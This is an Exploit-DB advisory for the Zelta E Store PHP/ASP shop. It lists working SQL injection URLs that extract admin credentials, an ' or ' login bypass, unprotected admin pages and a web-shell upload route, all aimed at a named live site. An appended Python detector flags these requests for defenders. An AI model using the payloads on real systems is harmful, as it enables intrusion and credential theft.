- 18 Dec 2022
- EDB-ID
- 7494
- EDB verification
- Passed
- Author
- ZORLU
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- N/A
- Publication date
- 2008-12-16
Code:
[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns.
[~]
[~] script: http://www.zeltatrade.com/
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 16/12/2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~] -----------------------------------------------------------
exp for demo: (R-SQL)
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
exp for demo: (B-SQL)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
exp for demo: (auth bypass)
http://joineazy.com/members/login.asp
username: [email protected]
pass: ' or '
exp for demo: (admin bypass)
http://joineazy.com/embadmin/admin_main.asp
http://joineazy.com/embadmin/site_setup.asp
http://joineazy.com/embadmin/main_baseimage.asp
exp for demo: (RFU)
first you register to site
login to site and edit your pictures select your shell.asp
go your shell asp:
http://joineazy.com/members/member_pictures/shell.asp
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-12-16]
- Source
- www.exploit-db.com
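
Added example, not part of the original advisory or of the vendor's code: a defender-side check that flags the request patterns the advisory lists (non-integer `p`/`category_id` values, `/embadmin/` pages requested without an admin session, and non-image files under `/members/member_pictures/`). The host `shop.example`, the function name `findings`, the `admin_session` flag and the image allow-list are assumptions made for illustration.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

NUMERIC_PARAMS = {"p", "category_id"}            # parameters the advisory shows as integers
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}   # assumed allow-list for member pictures
ADMIN_PREFIX = "/embadmin/"
UPLOAD_PREFIX = "/members/member_pictures/"

def findings(url, admin_session=False):
    """Return the reasons a request URL matches one of the advisory's patterns."""
    parts = urlsplit(url)
    path = unquote(parts.path).lower()
    out = []
    # parse_qs decodes '+' and %xx, so encoded values are checked in decoded form.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in NUMERIC_PARAMS:
            if any(not (v.isascii() and v.isdigit()) for v in values):
                out.append(f"non-numeric {name}")
    # Admin pages must never be served without an authenticated admin session.
    if path.startswith(ADMIN_PREFIX) and not admin_session:
        out.append("admin page without admin session")
    # Anything that is not an image in the upload directory is suspect.
    if path.startswith(UPLOAD_PREFIX):
        ext = posixpath.splitext(path)[1]
        if ext not in IMAGE_EXTS:
            out.append(f"non-image file in upload directory ({ext or 'no extension'})")
    return out

# Constructed sample requests (placeholder host): (url, has_admin_session)
SAMPLE = [
    ("http://shop.example/store/productsofcat.asp?p=1&category_id=17", False),
    ("http://shop.example/store/productsofcat.asp?p=1&category_id=17+and+1=1", False),
    ("http://shop.example/store/productsofcat.asp?p=1&category_id=17+union+select+1,2,3,4", False),
    ("http://shop.example/embadmin/site_setup.asp", False),
    ("http://shop.example/embadmin/site_setup.asp", True),
    ("http://shop.example/members/member_pictures/photo.JPG", False),
    ("http://shop.example/members/member_pictures/x.asp", False),
]

if __name__ == "__main__":
    for url, admin in SAMPLE:
        hits = findings(url, admin_session=admin)
        print("ALERT" if hits else "ok   ", url, hits)
```

The same integer check and extension allow-list belong in the application itself as input validation; the log-side version only tells you the requests were made.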